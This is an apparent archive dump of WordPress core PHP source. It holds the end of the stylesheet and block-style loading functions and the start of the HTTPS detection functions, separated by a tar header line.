if ( ! empty( $styles ) ) {
// Reorder styles array based on size.
usort(
$styles,
static function ( $a, $b ) {
return ( $a['size'] <= $b['size'] ) ? -1 : 1;
}
);
/*
* The total inlined size.
*
* On each iteration of the loop, if a style gets added inline the value of this var increases
* to reflect the total size of inlined styles.
*/
$total_inline_size = 0;
// Loop styles.
foreach ( $styles as $style ) {
// Size check. Since styles are ordered by size, we can break the loop.
if ( $total_inline_size + $style['size'] > $total_inline_limit ) {
break;
}
// Get the styles if we don't already have them.
$style['css'] = file_get_contents( $style['path'] );
/*
* Check if the style contains relative URLs that need to be modified.
* URLs relative to the stylesheet's path should be converted to relative to the site's root.
*/
$style['css'] = _wp_normalize_relative_css_links( $style['css'], $style['src'] );
// Keep track of the original `src` for the style that was inlined so that the `sourceURL` comment can be added.
$wp_styles->add_data( $style['handle'], 'inlined_src', $style['src'] );
// Set `src` to `false` and add styles inline.
$wp_styles->registered[ $style['handle'] ]->src = false;
if ( empty( $wp_styles->registered[ $style['handle'] ]->extra['after'] ) ) {
$wp_styles->registered[ $style['handle'] ]->extra['after'] = array();
}
array_unshift( $wp_styles->registered[ $style['handle'] ]->extra['after'], $style['css'] );
// Add the styles size to the $total_inline_size var.
$total_inline_size += (int) $style['size'];
}
}
}
/**
* Makes URLs relative to the WordPress installation.
*
* @since 5.9.0
* @access private
*
* @param string $css The CSS to make URLs relative to the WordPress installation.
* @param string $stylesheet_url The URL to the stylesheet.
*
* @return string The CSS with URLs made relative to the WordPress installation.
*/
function _wp_normalize_relative_css_links( $css, $stylesheet_url ) {
return preg_replace_callback(
'#(url\s*\(\s*[\'"]?\s*)([^\'"\)]+)#',
static function ( $matches ) use ( $stylesheet_url ) {
list( , $prefix, $url ) = $matches;
// Short-circuit if the URL does not require normalization.
if (
str_starts_with( $url, 'http:' ) ||
str_starts_with( $url, 'https:' ) ||
str_starts_with( $url, '/' ) ||
str_starts_with( $url, '#' ) ||
str_starts_with( $url, 'data:' )
) {
return $matches[0];
}
// Build the absolute URL.
$absolute_url = dirname( $stylesheet_url ) . '/' . $url;
$absolute_url = str_replace( '/./', '/', $absolute_url );
// Convert to URL related to the site root.
$url = wp_make_link_relative( $absolute_url );
return $prefix . $url;
},
$css
);
}
/**
* Function that enqueues the CSS Custom Properties coming from theme.json.
*
* @since 5.9.0
*/
function wp_enqueue_global_styles_css_custom_properties() {
wp_register_style( 'global-styles-css-custom-properties', false );
wp_add_inline_style( 'global-styles-css-custom-properties', wp_get_global_stylesheet( array( 'variables' ) ) );
wp_enqueue_style( 'global-styles-css-custom-properties' );
}
/**
* Hooks inline styles in the proper place, depending on the active theme.
*
* @since 5.9.1
* @since 6.1.0 Added the `$priority` parameter.
*
* For block themes, styles are loaded in the head.
* For classic ones, styles are loaded in the body because the wp_head action happens before render_block.
*
* @link https://core.trac.wordpress.org/ticket/53494.
*
* @param string $style String containing the CSS styles to be added.
* @param int $priority To set the priority for the add_action.
*/
function wp_enqueue_block_support_styles( $style, $priority = 10 ) {
$action_hook_name = 'wp_footer';
if ( wp_is_block_theme() ) {
$action_hook_name = 'wp_head';
}
add_action(
$action_hook_name,
static function () use ( $style ) {
echo "<style>$style</style>\n";
},
$priority
);
}
/**
* Fetches, processes and compiles stored core styles, then combines and renders them to the page.
* Styles are stored via the style engine API.
*
* @link https://developer.wordpress.org/block-editor/reference-guides/packages/packages-style-engine/
*
* @since 6.1.0
*
* @param array $options {
* Optional. An array of options to pass to wp_style_engine_get_stylesheet_from_context().
* Default empty array.
*
* @type bool $optimize Whether to optimize the CSS output, e.g., combine rules.
* Default false.
* @type bool $prettify Whether to add new lines and indents to output.
* Default to whether the `SCRIPT_DEBUG` constant is defined.
* }
*/
function wp_enqueue_stored_styles( $options = array() ) {
// Note: Styles printed at wp_footer for classic themes may still end up in the head due to wp_load_classic_theme_block_styles_on_demand().
$is_block_theme = wp_is_block_theme();
$is_classic_theme = ! $is_block_theme;
/*
* For block themes, this function prints stored styles in the header.
* For classic themes, in the footer.
*/
if (
( $is_block_theme && doing_action( 'wp_footer' ) ) ||
( $is_classic_theme && doing_action( 'wp_enqueue_scripts' ) )
) {
return;
}
$core_styles_keys = array( 'block-supports' );
$compiled_core_stylesheet = '';
$style_tag_id = 'core';
// Adds comment if code is prettified to identify core styles sections in debugging.
$should_prettify = isset( $options['prettify'] ) ? true === $options['prettify'] : defined( 'SCRIPT_DEBUG' ) && SCRIPT_DEBUG;
foreach ( $core_styles_keys as $style_key ) {
if ( $should_prettify ) {
$compiled_core_stylesheet .= "/**\n * Core styles: $style_key\n */\n";
}
// Chains core store ids to signify what the styles contain.
$style_tag_id .= '-' . $style_key;
$compiled_core_stylesheet .= wp_style_engine_get_stylesheet_from_context( $style_key, $options );
}
// Combines Core styles.
if ( ! empty( $compiled_core_stylesheet ) ) {
wp_register_style( $style_tag_id, false );
wp_add_inline_style( $style_tag_id, $compiled_core_stylesheet );
wp_enqueue_style( $style_tag_id );
}
// Prints out any other stores registered by themes or otherwise.
$additional_stores = WP_Style_Engine_CSS_Rules_Store::get_stores();
foreach ( array_keys( $additional_stores ) as $store_name ) {
if ( in_array( $store_name, $core_styles_keys, true ) ) {
continue;
}
$styles = wp_style_engine_get_stylesheet_from_context( $store_name, $options );
if ( ! empty( $styles ) ) {
$key = "wp-style-engine-$store_name";
wp_register_style( $key, false );
wp_add_inline_style( $key, $styles );
wp_enqueue_style( $key );
}
}
}
/**
* Enqueues a stylesheet for a specific block.
*
* If the theme has opted-in to load block styles on demand,
* then the stylesheet will be enqueued on-render,
* otherwise when the block inits.
*
* @since 5.9.0
*
* @param string $block_name The block-name, including namespace.
* @param array $args {
* An array of arguments. See wp_register_style() for full information about each argument.
*
* @type string $handle The handle for the stylesheet.
* @type string|false $src The source URL of the stylesheet.
* @type string[] $deps Array of registered stylesheet handles this stylesheet depends on.
* @type string|bool|null $ver Stylesheet version number.
* @type string $media The media for which this stylesheet has been defined.
* @type string|null $path Absolute path to the stylesheet, so that it can potentially be inlined.
* }
*/
function wp_enqueue_block_style( $block_name, $args ) {
$args = wp_parse_args(
$args,
array(
'handle' => '',
'src' => '',
'deps' => array(),
'ver' => false,
'media' => 'all',
)
);
/**
* Callback function to register and enqueue styles.
*
* @param string $content When the callback is used for the render_block filter,
* the content needs to be returned so the function parameter
* is to ensure the content exists.
* @return string Block content.
*/
$callback = static function ( $content ) use ( $args ) {
// Register the stylesheet.
if ( ! empty( $args['src'] ) ) {
wp_register_style( $args['handle'], $args['src'], $args['deps'], $args['ver'], $args['media'] );
}
// Add `path` data if provided.
if ( isset( $args['path'] ) ) {
wp_style_add_data( $args['handle'], 'path', $args['path'] );
// Get the RTL file path.
$rtl_file_path = str_replace( '.css', '-rtl.css', $args['path'] );
// Add RTL stylesheet.
if ( file_exists( $rtl_file_path ) ) {
wp_style_add_data( $args['handle'], 'rtl', 'replace' );
if ( is_rtl() ) {
wp_style_add_data( $args['handle'], 'path', $rtl_file_path );
}
}
}
// Enqueue the stylesheet.
wp_enqueue_style( $args['handle'] );
return $content;
};
$hook = did_action( 'wp_enqueue_scripts' ) ? 'wp_footer' : 'wp_enqueue_scripts';
if ( wp_should_load_block_assets_on_demand() ) {
/**
* Callback function to register and enqueue styles.
*
* @param string $content The block content.
* @param array $block The full block, including name and attributes.
* @return string Block content.
*/
$callback_separate = static function ( $content, $block ) use ( $block_name, $callback ) {
if ( ! empty( $block['blockName'] ) && $block_name === $block['blockName'] ) {
return $callback( $content );
}
return $content;
};
/*
* The filter's callback here is an anonymous function because
* using a named function in this case is not possible.
*
* The function cannot be unhooked, however, users are still able
* to dequeue the stylesheets registered/enqueued by the callback
* which is why in this case, using an anonymous function
* was deemed acceptable.
*/
add_filter( 'render_block', $callback_separate, 10, 2 );
return;
}
/*
* The filter's callback here is an anonymous function because
* using a named function in this case is not possible.
*
* The function cannot be unhooked, however, users are still able
* to dequeue the stylesheets registered/enqueued by the callback
* which is why in this case, using an anonymous function
* was deemed acceptable.
*/
add_filter( $hook, $callback );
// Enqueue assets in the editor.
add_action( 'enqueue_block_assets', $callback );
}
/**
* Loads classic theme styles on classic themes in the frontend.
*
* This is used for backwards compatibility for Button and File blocks specifically.
*
* @since 6.1.0
* @since 6.2.0 Added File block styles.
* @since 6.8.0 Moved stylesheet registration outside of this function.
*/
function wp_enqueue_classic_theme_styles() {
if ( ! wp_theme_has_theme_json() ) {
wp_enqueue_style( 'classic-theme-styles' );
}
}
/**
* Enqueues the assets required for the Command Palette.
*
* @since 6.9.0
*
* @global array $menu
* @global array $submenu
*/
function wp_enqueue_command_palette_assets() {
global $menu, $submenu;
$command_palette_settings = array(
'is_network_admin' => is_network_admin(),
);
if ( $menu ) {
$menu_commands = array();
foreach ( $menu as $menu_item ) {
if ( empty( $menu_item[0] ) || ! empty( $menu_item[1] ) && ! current_user_can( $menu_item[1] ) ) {
continue;
}
// Remove all HTML tags and their contents.
$menu_label = $menu_item[0];
while ( preg_match( '/<[^>]*>/', $menu_label ) ) {
$menu_label = preg_replace( '/<[^>]*>.*?<\/[^>]*>|<[^>]*\/>|<[^>]*>/s', '', $menu_label );
}
$menu_label = trim( $menu_label );
$menu_url = '';
$menu_slug = $menu_item[2];
if ( preg_match( '/\.php($|\?)/', $menu_slug ) || wp_http_validate_url( $menu_slug ) ) {
$menu_url = $menu_slug;
} elseif ( ! empty( menu_page_url( $menu_slug, false ) ) ) {
$menu_url = html_entity_decode( menu_page_url( $menu_slug, false ), ENT_QUOTES, get_bloginfo( 'charset' ) );
}
if ( $menu_url ) {
$menu_commands[] = array(
'label' => $menu_label,
'url' => $menu_url,
'name' => $menu_slug,
);
}
if ( array_key_exists( $menu_slug, $submenu ) ) {
foreach ( $submenu[ $menu_slug ] as $submenu_item ) {
if ( empty( $submenu_item[0] ) || ! empty( $submenu_item[1] ) && ! current_user_can( $submenu_item[1] ) ) {
continue;
}
// Remove all HTML tags and their contents.
$submenu_label = $submenu_item[0];
while ( preg_match( '/<[^>]*>/', $submenu_label ) ) {
$submenu_label = preg_replace( '/<[^>]*>.*?<\/[^>]*>|<[^>]*\/>|<[^>]*>/s', '', $submenu_label );
}
$submenu_label = trim( $submenu_label );
$submenu_url = '';
$submenu_slug = $submenu_item[2];
if ( preg_match( '/\.php($|\?)/', $submenu_slug ) || wp_http_validate_url( $submenu_slug ) ) {
$submenu_url = $submenu_slug;
} elseif ( ! empty( menu_page_url( $submenu_slug, false ) ) ) {
$submenu_url = html_entity_decode( menu_page_url( $submenu_slug, false ), ENT_QUOTES, get_bloginfo( 'charset' ) );
}
if ( $submenu_url ) {
$menu_commands[] = array(
'label' => sprintf(
/* translators: 1: Menu label, 2: Submenu label. */
__( '%1$s > %2$s' ),
$menu_label,
$submenu_label
),
'url' => $submenu_url,
'name' => $menu_slug . '-' . $submenu_item[2],
);
}
}
}
}
$command_palette_settings['menu_commands'] = $menu_commands;
}
wp_enqueue_script( 'wp-commands' );
wp_enqueue_style( 'wp-commands' );
wp_enqueue_script( 'wp-core-commands' );
wp_add_inline_script(
'wp-core-commands',
sprintf(
'wp.coreCommands.initializeCommandPalette( %s );',
wp_json_encode( $command_palette_settings, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
)
);
}
/**
* Removes leading and trailing _empty_ script tags.
*
* This is a helper meant to be used for literal script tag construction
* within `wp_get_inline_script_tag()` or `wp_print_inline_script_tag()`.
* It removes the literal values of "<script>" and "</script>" from
* around an inline script after trimming whitespace. Typically this
* is used in conjunction with output buffering, where `ob_get_clean()`
* is passed as the `$contents` argument.
*
* Example:
*
* // Strips exact literal empty SCRIPT tags.
* $js = '<script>sayHello();</script>;
* 'sayHello();' === wp_remove_surrounding_empty_script_tags( $js );
*
* // Otherwise if anything is different it warns in the JS console.
* $js = '<script type="text/javascript">console.log( "hi" );</script>';
* 'console.error( ... )' === wp_remove_surrounding_empty_script_tags( $js );
*
* @since 6.4.0
* @access private
*
* @see wp_print_inline_script_tag()
* @see wp_get_inline_script_tag()
*
* @param string $contents Script body with manually created SCRIPT tag literals.
* @return string Script body without surrounding script tag literals, or
* original contents if both exact literals aren't present.
*/
function wp_remove_surrounding_empty_script_tags( $contents ) {
$contents = trim( $contents );
$opener = '<SCRIPT>';
$closer = '</SCRIPT>';
if (
strlen( $contents ) > strlen( $opener ) + strlen( $closer ) &&
strtoupper( substr( $contents, 0, strlen( $opener ) ) ) === $opener &&
strtoupper( substr( $contents, -strlen( $closer ) ) ) === $closer
) {
return substr( $contents, strlen( $opener ), -strlen( $closer ) );
} else {
$error_message = __( 'Expected string to start with script tag (without attributes) and end with script tag, with optional whitespace.' );
_doing_it_wrong( __FUNCTION__, $error_message, '6.4' );
return sprintf(
'console.error(%s)',
wp_json_encode(
sprintf(
/* translators: %s: wp_remove_surrounding_empty_script_tags() */
__( 'Function %s used incorrectly in PHP.' ),
'wp_remove_surrounding_empty_script_tags()'
) . ' ' . $error_message
)
);
}
}
/**
* Adds hooks to load block styles on demand in classic themes.
*
* @since 6.9.0
*
* @see _add_default_theme_supports()
*/
function wp_load_classic_theme_block_styles_on_demand() {
// This is not relevant to block themes, as they are opted in to loading separate styles on demand via _add_default_theme_supports().
if ( wp_is_block_theme() ) {
return;
}
/*
* Make sure that wp_should_output_buffer_template_for_enhancement() returns true even if there aren't any
* `wp_template_enhancement_output_buffer` filters added, but do so at priority zero so that applications which
* wish to stream responses can more easily turn this off.
*/
add_filter( 'wp_should_output_buffer_template_for_enhancement', '__return_true', 0 );
// If a site has opted out of the template enhancement output buffer, then bail.
if ( ! wp_should_output_buffer_template_for_enhancement() ) {
return;
}
// The following two filters are added by default for block themes in _add_default_theme_supports().
/*
* Load separate block styles so that the large block-library stylesheet is not enqueued unconditionally, and so
* that block-specific styles will only be enqueued when they are used on the page. A priority of zero allows for
* this to be easily overridden by themes which wish to opt out. If a site has explicitly opted out of loading
* separate block styles, then abort.
*/
add_filter( 'should_load_separate_core_block_assets', '__return_true', 0 );
if ( ! wp_should_load_separate_core_block_assets() ) {
return;
}
/*
* Also ensure that block assets are loaded on demand (although the default value is from should_load_separate_core_block_assets).
* As above, a priority of zero allows for this to be easily overridden by themes which wish to opt out. If a site
* has explicitly opted out of loading block styles on demand, then abort.
*/
add_filter( 'should_load_block_assets_on_demand', '__return_true', 0 );
if ( ! wp_should_load_block_assets_on_demand() ) {
return;
}
// Add hooks which require the presence of the output buffer. Ideally the above two filters could be added here, but they run too early.
add_action( 'wp_template_enhancement_output_buffer_started', 'wp_hoist_late_printed_styles' );
}
/**
* Adds the hooks needed for CSS output to be delayed until after the content of the page has been established.
*
* @since 6.9.0
*
* @see wp_load_classic_theme_block_styles_on_demand()
* @see _wp_footer_scripts()
*/
function wp_hoist_late_printed_styles() {
// Skip the embed template on-demand styles aren't relevant, and there is no wp_head action.
if ( is_embed() ) {
return;
}
// Capture the styles enqueued at the enqueue_block_assets action, so that non-core block styles and global styles can be inserted afterwards during hoisting.
$style_handles_at_enqueue_block_assets = array();
add_action(
'enqueue_block_assets',
static function () use ( &$style_handles_at_enqueue_block_assets ) {
$style_handles_at_enqueue_block_assets = wp_styles()->queue;
},
PHP_INT_MIN
);
add_action(
'enqueue_block_assets',
static function () use ( &$style_handles_at_enqueue_block_assets ) {
$style_handles_at_enqueue_block_assets = array_values( array_diff( wp_styles()->queue, $style_handles_at_enqueue_block_assets ) );
},
PHP_INT_MAX
);
/*
* Add a placeholder comment into the inline styles for wp-block-library, after which the late block styles
* can be hoisted from the footer to be printed in the header by means of a filter below on the template enhancement
* output buffer. The `wp_print_styles` action is used to ensure that if the inline style gets replaced at
* `enqueue_block_assets` or `wp_enqueue_scripts` that the placeholder will be sure to be present.
*/
$placeholder = sprintf( '/*%s*/', uniqid( 'wp_block_styles_on_demand_placeholder:' ) );
add_action(
'wp_print_styles',
static function () use ( $placeholder ) {
wp_add_inline_style( 'wp-block-library', $placeholder );
}
);
/*
* Create a substitute for `print_late_styles()` which is aware of block styles. This substitute does not print
* the styles, but it captures what would be printed for block styles and non-block styles so that they can be
* later hoisted to the HEAD in the template enhancement output buffer. This will run at `wp_print_footer_scripts`
* before `print_footer_scripts()` is called.
*/
$printed_core_block_styles = '';
$printed_other_block_styles = '';
$printed_global_styles = '';
$printed_late_styles = '';
$capture_late_styles = static function () use ( &$printed_core_block_styles, &$printed_other_block_styles, &$printed_global_styles, &$printed_late_styles ) {
// Gather the styles related to on-demand block enqueues.
$all_core_block_style_handles = array();
$all_other_block_style_handles = array();
foreach ( WP_Block_Type_Registry::get_instance()->get_all_registered() as $block_type ) {
if ( str_starts_with( $block_type->name, 'core/' ) ) {
foreach ( $block_type->style_handles as $style_handle ) {
$all_core_block_style_handles[] = $style_handle;
}
} else {
foreach ( $block_type->style_handles as $style_handle ) {
$all_other_block_style_handles[] = $style_handle;
}
}
}
/*
* First print all styles related to blocks which should be inserted right after the wp-block-library stylesheet
* to preserve the CSS cascade. The logic in this `if` statement is derived from `wp_print_styles()`.
*/
$enqueued_core_block_styles = array_values( array_intersect( $all_core_block_style_handles, wp_styles()->queue ) );
if ( count( $enqueued_core_block_styles ) > 0 ) {
ob_start();
wp_styles()->do_items( $enqueued_core_block_styles );
$printed_core_block_styles = ob_get_clean();
}
// Non-core block styles get printed after the classic-theme-styles stylesheet.
$enqueued_other_block_styles = array_values( array_intersect( $all_other_block_style_handles, wp_styles()->queue ) );
if ( count( $enqueued_other_block_styles ) > 0 ) {
ob_start();
wp_styles()->do_items( $enqueued_other_block_styles );
$printed_other_block_styles = ob_get_clean();
}
// Capture the global-styles so that it can be printed separately after classic-theme-styles and other styles enqueued at enqueue_block_assets.
if ( wp_style_is( 'global-styles' ) ) {
ob_start();
wp_styles()->do_items( array( 'global-styles' ) );
$printed_global_styles = ob_get_clean();
}
/*
* Print all remaining styles not related to blocks. This contains a subset of the logic from
* `print_late_styles()`, without admin-specific logic and the `print_late_styles` filter to control whether
* late styles are printed (since they are being hoisted anyway).
*/
ob_start();
wp_styles()->do_footer_items();
$printed_late_styles = ob_get_clean();
};
/*
* If `_wp_footer_scripts()` was unhooked from the `wp_print_footer_scripts` action, or if `wp_print_footer_scripts()`
* was unhooked from running at the `wp_footer` action, then only add a callback to `wp_footer` which will capture the
* late-printed styles.
*
* Otherwise, in the normal case where `_wp_footer_scripts()` will run at the `wp_print_footer_scripts` action, then
* swap out `_wp_footer_scripts()` with an alternative which captures the printed styles (for hoisting to HEAD) before
* proceeding with printing the footer scripts.
*/
$wp_print_footer_scripts_priority = has_action( 'wp_print_footer_scripts', '_wp_footer_scripts' );
if ( false === $wp_print_footer_scripts_priority || false === has_action( 'wp_footer', 'wp_print_footer_scripts' ) ) {
// The normal priority for wp_print_footer_scripts() is to run at 20.
add_action( 'wp_footer', $capture_late_styles, 20 );
} else {
remove_action( 'wp_print_footer_scripts', '_wp_footer_scripts', $wp_print_footer_scripts_priority );
add_action(
'wp_print_footer_scripts',
static function () use ( $capture_late_styles ) {
$capture_late_styles();
print_footer_scripts();
},
$wp_print_footer_scripts_priority
);
}
// Replace placeholder with the captured late styles.
add_filter(
'wp_template_enhancement_output_buffer',
static function ( $buffer ) use ( $placeholder, &$style_handles_at_enqueue_block_assets, &$printed_core_block_styles, &$printed_other_block_styles, &$printed_global_styles, &$printed_late_styles ) {
// Anonymous subclass of WP_HTML_Tag_Processor which exposes underlying bookmark spans.
$processor = new class( $buffer ) extends WP_HTML_Tag_Processor {
/**
* Gets the span for the current token.
*
* @return WP_HTML_Span Current token span.
*/
private function get_span(): WP_HTML_Span {
// Note: This call will never fail according to the usage of this class, given it is always called after ::next_tag() is true.
$this->set_bookmark( 'here' );
return $this->bookmarks['here'];
}
/**
* Inserts text before the current token.
*
* @param string $text Text to insert.
*/
public function insert_before( string $text ) {
$this->lexical_updates[] = new WP_HTML_Text_Replacement( $this->get_span()->start, 0, $text );
}
/**
* Inserts text after the current token.
*
* @param string $text Text to insert.
*/
public function insert_after( string $text ) {
$span = $this->get_span();
$this->lexical_updates[] = new WP_HTML_Text_Replacement( $span->start + $span->length, 0, $text );
}
/**
* Removes the current token.
*/
public function remove() {
$span = $this->get_span();
$this->lexical_updates[] = new WP_HTML_Text_Replacement( $span->start, $span->length, '' );
}
};
// Locate the insertion points in the HEAD.
while ( $processor->next_tag( array( 'tag_closers' => 'visit' ) ) ) {
if (
'STYLE' === $processor->get_tag() &&
'wp-block-library-inline-css' === $processor->get_attribute( 'id' )
) {
$processor->set_bookmark( 'wp_block_library' );
} elseif ( 'HEAD' === $processor->get_tag() && $processor->is_tag_closer() ) {
$processor->set_bookmark( 'head_end' );
break;
} elseif ( ( 'STYLE' === $processor->get_tag() || 'LINK' === $processor->get_tag() ) && $processor->get_attribute( 'id' ) ) {
$id = $processor->get_attribute( 'id' );
$handle = null;
if ( 'STYLE' === $processor->get_tag() ) {
if ( preg_match( '/^(.+)-inline-css$/', $id, $matches ) ) {
$handle = $matches[1];
}
} elseif ( preg_match( '/^(.+)-css$/', $id, $matches ) ) {
$handle = $matches[1];
}
if ( 'classic-theme-styles' === $handle ) {
$processor->set_bookmark( 'classic_theme_styles' );
}
if ( $handle && in_array( $handle, $style_handles_at_enqueue_block_assets, true ) ) {
if ( ! $processor->has_bookmark( 'first_style_at_enqueue_block_assets' ) ) {
$processor->set_bookmark( 'first_style_at_enqueue_block_assets' );
}
$processor->set_bookmark( 'last_style_at_enqueue_block_assets' );
}
}
}
/*
* Insert block styles right after wp-block-library (if it is present). The placeholder CSS comment will
* always be added to the wp-block-library inline style since it gets printed at `wp_head` before the blocks
* are rendered. This means that there may not actually be any block styles to hoist from the footer to
* insert after this inline style. The placeholder CSS comment needs to be added so that the inline style
* gets printed, but if the resulting inline style is empty after the placeholder is removed, then the
* inline style is removed.
*/
if ( $processor->has_bookmark( 'wp_block_library' ) ) {
$processor->seek( 'wp_block_library' );
$css_text = $processor->get_modifiable_text();
/*
* A placeholder CSS comment is added to the inline style in order to force an inline STYLE tag to
* be printed. Now that we've located the inline style, the placeholder comment can be removed. If
* there is no CSS left in the STYLE tag after removing the placeholder (aside from the sourceURL
* comment), then remove the STYLE entirely.
*/
$css_text = str_replace( $placeholder, '', $css_text );
if ( preg_match( ':^/\*# sourceURL=\S+? \*/$:', trim( $css_text ) ) ) {
$processor->remove();
} else {
$processor->set_modifiable_text( $css_text );
}
$inserted_after = $printed_core_block_styles;
$printed_core_block_styles = '';
// If the classic-theme-styles is absent, then the third-party block styles cannot be inserted after it, so they get inserted here.
if ( ! $processor->has_bookmark( 'classic_theme_styles' ) ) {
if ( '' !== $printed_other_block_styles ) {
$inserted_after .= $printed_other_block_styles;
}
$printed_other_block_styles = '';
// If there aren't any other styles printed at enqueue_block_assets either, then the global styles need to also be printed here.
if ( ! $processor->has_bookmark( 'last_style_at_enqueue_block_assets' ) ) {
if ( '' !== $printed_global_styles ) {
$inserted_after .= $printed_global_styles;
}
$printed_global_styles = '';
}
}
if ( '' !== $inserted_after ) {
$processor->insert_after( "\n" . $inserted_after );
}
}
// Insert global-styles after the styles enqueued at enqueue_block_assets.
if ( '' !== $printed_global_styles && $processor->has_bookmark( 'last_style_at_enqueue_block_assets' ) ) {
$processor->seek( 'last_style_at_enqueue_block_assets' );
$processor->insert_after( "\n" . $printed_global_styles );
$printed_global_styles = '';
if ( ! $processor->has_bookmark( 'classic_theme_styles' ) && '' !== $printed_other_block_styles ) {
$processor->insert_after( "\n" . $printed_other_block_styles );
$printed_other_block_styles = '';
}
}
// Insert third-party block styles right after the classic-theme-styles.
if ( '' !== $printed_other_block_styles && $processor->has_bookmark( 'classic_theme_styles' ) ) {
$processor->seek( 'classic_theme_styles' );
$processor->insert_after( "\n" . $printed_other_block_styles );
$printed_other_block_styles = '';
}
// Print all remaining styles.
$remaining_styles = $printed_core_block_styles . $printed_other_block_styles . $printed_global_styles . $printed_late_styles;
if ( $remaining_styles && $processor->has_bookmark( 'head_end' ) ) {
$processor->seek( 'head_end' );
$processor->insert_before( $remaining_styles . "\n" );
}
return $processor->get_updated_html();
}
);
}
/**
* Return the corresponding JavaScript `dataset` name for an attribute
* if it represents a custom data attribute, or `null` if not.
*
* Custom data attributes appear in an element's `dataset` property in a
* browser, but there's a specific way the names are translated from HTML
* into JavaScript. This function indicates how the name would appear in
* JavaScript if a browser would recognize it as a custom data attribute.
*
* Example:
*
* // Dash-letter pairs turn into capital letters.
* 'postId' === wp_js_dataset_name( 'data-post-id' );
* 'Before' === wp_js_dataset_name( 'data--before' );
* '-One--Two---' === wp_js_dataset_name( 'data---one---two---' );
*
* // Not every attribute name will be interpreted as a custom data attribute.
* null === wp_js_dataset_name( 'post-id' );
* null === wp_js_dataset_name( 'data' );
*
* // Some very surprising names will; for example, a property whose name is the empty string.
* '' === wp_js_dataset_name( 'data-' );
* 0 === strlen( wp_js_dataset_name( 'data-' ) );
*
* @since 6.9.0
*
* @see https://html.spec.whatwg.org/#concept-domstringmap-pairs
* @see \wp_html_custom_data_attribute_name()
*
* @param string $html_attribute_name Raw attribute name as found in the source HTML.
* @return string|null Transformed `dataset` name, if interpretable as a custom data attribute, else `null`.
*/
function wp_js_dataset_name( string $html_attribute_name ): ?string {
if ( 0 !== substr_compare( $html_attribute_name, 'data-', 0, 5, true ) ) {
return null;
}
$end = strlen( $html_attribute_name );
/*
* If it contains characters which would end the attribute name parsing then
* something else is wrong and this contains more than just an attribute name.
*/
if ( ( $end - 5 ) !== strcspn( $html_attribute_name, "=/> \t\f\r\n", 5 ) ) {
return null;
}
/**
* > For each name in list, for each U+002D HYPHEN-MINUS character (-)
* > in the name that is followed by an ASCII lower alpha, remove the
* > U+002D HYPHEN-MINUS character (-) and replace the character that
* > followed it by the same character converted to ASCII uppercase.
*
* @see https://html.spec.whatwg.org/#concept-domstringmap-pairs
*/
$custom_name = '';
$at = 5;
$was_at = $at;
while ( $at < $end ) {
$next_dash_at = strpos( $html_attribute_name, '-', $at );
if ( false === $next_dash_at || $next_dash_at === $end - 1 ) {
break;
}
// Transform `-a` to `A`, for example.
$c = $html_attribute_name[ $next_dash_at + 1 ];
if ( ( $c >= 'A' && $c <= 'Z' ) || ( $c >= 'a' && $c <= 'z' ) ) {
$prefix = substr( $html_attribute_name, $was_at, $next_dash_at - $was_at );
$custom_name .= strtolower( $prefix );
$custom_name .= strtoupper( $c );
$at = $next_dash_at + 2;
$was_at = $at;
continue;
}
$at = $next_dash_at + 1;
}
// If nothing has been added it means there are no dash-letter pairs; return the name as-is.
return '' === $custom_name
? strtolower( substr( $html_attribute_name, 5 ) )
: ( $custom_name . strtolower( substr( $html_attribute_name, $was_at ) ) );
}
/**
* Returns a corresponding HTML attribute name for the given name,
* if that name were found in a JS element’s `dataset` property.
*
* Example:
*
* 'data-post-id' === wp_html_custom_data_attribute_name( 'postId' );
* 'data--before' === wp_html_custom_data_attribute_name( 'Before' );
* 'data---one---two---' === wp_html_custom_data_attribute_name( '-One--Two---' );
*
* // Not every attribute name will be interpreted as a custom data attribute.
* null === wp_html_custom_data_attribute_name( '/not-an-attribute/' );
* null === wp_html_custom_data_attribute_name( 'no spaces' );
*
* // Some very surprising names will; for example, a property whose name is the empty string.
* 'data-' === wp_html_custom_data_attribute_name( '' );
*
* @since 6.9.0
*
* @see https://html.spec.whatwg.org/#concept-domstringmap-pairs
* @see \wp_js_dataset_name()
*
* @param string $js_dataset_name Name of JS `dataset` property to transform.
* @return string|null Corresponding name of an HTML custom data attribute for the given dataset name,
* if possible to represent in HTML, otherwise `null`.
*/
function wp_html_custom_data_attribute_name( string $js_dataset_name ): ?string {
$end = strlen( $js_dataset_name );
if ( 0 === $end ) {
return 'data-';
}
/*
* If it contains characters which would end the attribute name parsing then
* something it’s not possible to represent this in HTML.
*/
if ( strcspn( $js_dataset_name, "=/> \t\f\r\n" ) !== $end ) {
return null;
}
$html_name = 'data-';
$at = 0;
$was_at = $at;
while ( $at < $end ) {
$next_upper_after = strcspn( $js_dataset_name, 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', $at );
$next_upper_at = $at + $next_upper_after;
if ( $next_upper_at >= $end ) {
break;
}
$prefix = substr( $js_dataset_name, $was_at, $next_upper_at - $was_at );
$html_name .= strtolower( $prefix );
$html_name .= '-' . strtolower( $js_dataset_name[ $next_upper_at ] );
$at = $next_upper_at + 1;
$was_at = $at;
}
if ( $was_at < $end ) {
$html_name .= strtolower( substr( $js_dataset_name, $was_at ) );
}
return $html_name;
}
https-detection-20260605100735-20260621081107.php 0000666 00000013341 15224151221 0013337 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
